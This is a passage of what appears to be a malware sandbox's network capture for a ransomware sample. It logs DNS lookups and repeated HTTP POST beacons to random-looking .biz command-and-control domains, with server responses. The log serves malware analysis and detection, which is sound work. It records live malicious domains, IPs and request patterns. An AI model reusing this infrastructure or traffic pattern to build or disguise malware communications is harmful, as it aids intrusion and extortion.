User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:02:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=da74dbfcb66a504125ef80751dc4565f|191.101.209.39|1717923761|1717923761|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
POST

http://ssbzmoy.biz/gjmekjil

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /gjmekjil HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:02:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=2d89cd231511a1dcd652d183fdd789f6|191.101.209.39|1717923761|1717923761|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

177.188.244.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

177.188.244.54.in-addr.arpa

IN PTR

Response

177.188.244.54.in-addr.arpa

IN PTR

ec2-54-244-188-177 us-west-2compute amazonawscom
DNS

cvgrf.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

cvgrf.biz

IN A

Response

cvgrf.biz

IN A

54.244.188.177
POST

http://cvgrf.biz/v

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.244.188.177:80

Request

POST /v HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:02:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a538be4928e8fc07c8467894dcf70688|191.101.209.39|1717923761|1717923761|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

cvgrf.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

cvgrf.biz

IN A

Response

cvgrf.biz

IN A

107.178.223.183

cvgrf.biz

IN A

104.155.138.21
POST

http://cvgrf.biz/jpgfpgmjpg

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

107.178.223.183:80

Request

POST /jpgfpgmjpg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Content-Length: 0
DNS

107.10.141.18.in-addr.arpa

Remote address:

8.8.8.8:53

Request

107.10.141.18.in-addr.arpa

IN PTR

Response

107.10.141.18.in-addr.arpa

IN PTR

ec2-18-141-10-107ap-southeast-1compute amazonawscom
DNS

npukfztj.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

npukfztj.biz

IN A

Response

npukfztj.biz

IN A

44.221.84.105
POST

http://npukfztj.biz/xo

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.221.84.105:80

Request

POST /xo HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:02:41 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=a00c38221484ba08064eb3272dec31d7|191.101.209.39|1717923761|1717923761|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

przvgke.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

przvgke.biz

IN A

Response

przvgke.biz

IN A

54.157.24.8

przvgke.biz

IN A

44.208.124.139

przvgke.biz

IN A

34.193.97.35
POST

http://przvgke.biz/dbqwptpllevka

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.157.24.8:80

Request

POST /dbqwptpllevka HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876
POST

http://przvgke.biz/mlk

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.157.24.8:80

Request

POST /mlk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876
DNS

zlenh.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

zlenh.biz

IN A

Response
DNS

knjghuig.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

knjghuig.biz

IN A

Response

knjghuig.biz

IN A

18.141.10.107
POST

http://knjghuig.biz/mchkkwhcopk

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /mchkkwhcopk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:02:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=8ac6c0ea6f765c2cee560e74779dd787|191.101.209.39|1717923763|1717923763|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

20.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

20.160.190.20.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

105.84.221.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

105.84.221.44.in-addr.arpa

IN PTR

Response

105.84.221.44.in-addr.arpa

IN PTR

ec2-44-221-84-105 compute-1 amazonawscom
DNS

8.24.157.54.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.24.157.54.in-addr.arpa

IN PTR

Response

8.24.157.54.in-addr.arpa

IN PTR

ec2-54-157-24-8 compute-1 amazonawscom
DNS

uhxqin.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

uhxqin.biz

IN A

Response
DNS

anpmnmxo.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

anpmnmxo.biz

IN A

Response
DNS

lpuegx.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

lpuegx.biz

IN A

Response

lpuegx.biz

IN A

82.112.184.197
DNS

183.223.178.107.in-addr.arpa

Remote address:

8.8.8.8:53

Request

183.223.178.107.in-addr.arpa

IN PTR

Response

183.223.178.107.in-addr.arpa

IN PTR

183223178107bcgoogleusercontentcom
DNS

npukfztj.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

npukfztj.biz

IN A

Response

npukfztj.biz

IN A

44.221.84.105
POST

http://npukfztj.biz/jquwruktof

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

44.221.84.105:80

Request

POST /jquwruktof HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: npukfztj.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:02:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5b6fef48e0322cac2557ad8f92d5ef6b|191.101.209.39|1717923772|1717923772|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

przvgke.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

przvgke.biz

IN A

Response

przvgke.biz

IN A

54.157.24.8

przvgke.biz

IN A

44.208.124.139

przvgke.biz

IN A

34.193.97.35
POST

http://przvgke.biz/ocmvd

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.157.24.8:80

Request

POST /ocmvd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920
DNS

154.239.44.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

154.239.44.20.in-addr.arpa

IN PTR

Response
POST

http://przvgke.biz/qtfefev

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

54.157.24.8:80

Request

POST /qtfefev HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920
DNS

zlenh.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

zlenh.biz

IN A

Response
DNS

knjghuig.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

knjghuig.biz

IN A

Response

knjghuig.biz

IN A

18.141.10.107
POST

http://knjghuig.biz/hyy

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

18.141.10.107:80

Request

POST /hyy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: knjghuig.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 920

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:02:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=d706c03379de661837363eebad4ca3ce|191.101.209.39|1717923773|1717923773|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

uhxqin.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

uhxqin.biz

IN A

Response
DNS

anpmnmxo.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

anpmnmxo.biz

IN A

Response
DNS

lpuegx.biz

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

8.8.8.8:53

Request

lpuegx.biz

IN A

Response

lpuegx.biz

IN A

82.112.184.197
DNS

157.123.68.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

157.123.68.40.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

vjaxhpbji.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vjaxhpbji.biz

IN A

Response

vjaxhpbji.biz

IN A

82.112.184.197
DNS

vjaxhpbji.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vjaxhpbji.biz

IN A

Response

vjaxhpbji.biz

IN A

82.112.184.197
DNS

144.107.17.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

144.107.17.2.in-addr.arpa

IN PTR

Response

144.107.17.2.in-addr.arpa

IN PTR

a2-17-107-144deploystaticakamaitechnologiescom
DNS

xlfhhhm.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

xlfhhhm.biz

IN A

Response

xlfhhhm.biz

IN A

44.200.43.61
POST

http://xlfhhhm.biz/sayiiucrcw

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

44.200.43.61:80

Request

POST /sayiiucrcw HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: xlfhhhm.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1f2e5d4bbfcc2503e114f792015b64c9|191.101.209.39|1717923848|1717923848|0|1|0; path=/; domain=.xlfhhhm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

ifsaia.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

ifsaia.biz

IN A

Response

ifsaia.biz

IN A

13.251.16.150
POST

http://ifsaia.biz/qmritt

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

13.251.16.150:80

Request

POST /qmritt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ifsaia.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=035743bb57bb5b75256f23f1cf5a7e8c|191.101.209.39|1717923849|1717923849|0|1|0; path=/; domain=.ifsaia.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

saytjshyf.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

saytjshyf.biz

IN A

Response

saytjshyf.biz

IN A

3.237.86.197
DNS

saytjshyf.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

saytjshyf.biz

IN A

Response

saytjshyf.biz

IN A

3.237.86.197
POST

http://saytjshyf.biz/vnfosmfrakk

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

3.237.86.197:80

Request

POST /vnfosmfrakk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: saytjshyf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:09 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=1ebce1cb8be22046dfc8ab356c9a1cb4|191.101.209.39|1717923849|1717923849|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

vcddkls.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

vcddkls.biz

IN A

Response

vcddkls.biz

IN A

18.141.10.107
POST

http://vcddkls.biz/pgvkv

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

18.141.10.107:80

Request

POST /pgvkv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: vcddkls.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=756b86dab805969dbee8ff7ad13959c9|191.101.209.39|1717923850|1717923850|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

61.43.200.44.in-addr.arpa

Remote address:

8.8.8.8:53

Request

61.43.200.44.in-addr.arpa

IN PTR

Response

61.43.200.44.in-addr.arpa

IN PTR

ec2-44-200-43-61 compute-1 amazonawscom
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

150.16.251.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

150.16.251.13.in-addr.arpa

IN PTR

Response

150.16.251.13.in-addr.arpa

IN PTR

ec2-13-251-16-150ap-southeast-1compute amazonawscom
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response
DNS

fwiwk.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

fwiwk.biz

IN A

Response

fwiwk.biz

IN A

54.157.24.8

fwiwk.biz

IN A

34.193.97.35

fwiwk.biz

IN A

44.208.124.139
DNS

197.86.237.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

197.86.237.3.in-addr.arpa

IN PTR

Response

197.86.237.3.in-addr.arpa

IN PTR

ec2-3-237-86-197 compute-1 amazonawscom
POST

http://fwiwk.biz/vajxnkrmpri

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.157.24.8:80

Request

POST /vajxnkrmpri HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876
POST

http://fwiwk.biz/aoofxoeugctqc

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.157.24.8:80

Request

POST /aoofxoeugctqc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876
DNS

tbjrpv.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

tbjrpv.biz

IN A

Response

tbjrpv.biz

IN A

34.246.200.160
POST

http://tbjrpv.biz/tofitmhf

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

34.246.200.160:80

Request

POST /tofitmhf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=60f3d550e55cb25b80e1fdca82766a0d|191.101.209.39|1717923851|1717923851|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

deoci.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

deoci.biz

IN A

Response

deoci.biz

IN A

54.80.154.23
POST

http://deoci.biz/aedldydumworsclk

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

54.80.154.23:80

Request

POST /aedldydumworsclk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 200 OK

Server: nginx
Date: Sun, 09 Jun 2024 09:04:11 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9727e9d88045d757838122522ed0f16e|191.101.209.39|1717923851|1717923851|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=191.101.209.39; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
DNS

gytujflc.biz

2024-06-09_5cb7112d86264587678a912e0892d430_bkransomware.exe

Remote address:

8.8.8.8:53

Request

gytujflc.biz

IN A

Response

gytujflc.biz

IN A

208.100.26.245
POST

http://gytujflc.biz/xxulvwpkxxk

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

208.100.26.245:80

Request

POST /xxulvwpkxxk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:11 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gytujflc.biz/tc

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

208.100.26.245:80

Request

POST /tc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:11 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/aucf

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

208.100.26.245:80

Request

POST /aucf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:15 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://yunalwv.biz/ddnhuqcu

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

208.100.26.245:80

Request

POST /ddnhuqcu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yunalwv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:15 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/e

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

208.100.26.245:80

Request

POST /e HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

HTTP/1.1 404 Not Found

Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 09 Jun 2024 09:04:34 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
POST

http://gjogvvpsf.biz/hnqkj

DiagnosticsHub.StandardCollector.Service.exe

Remote address:

208.100.26.245:80

Request

POST /hnqkj HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gjogvvpsf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 876

Response

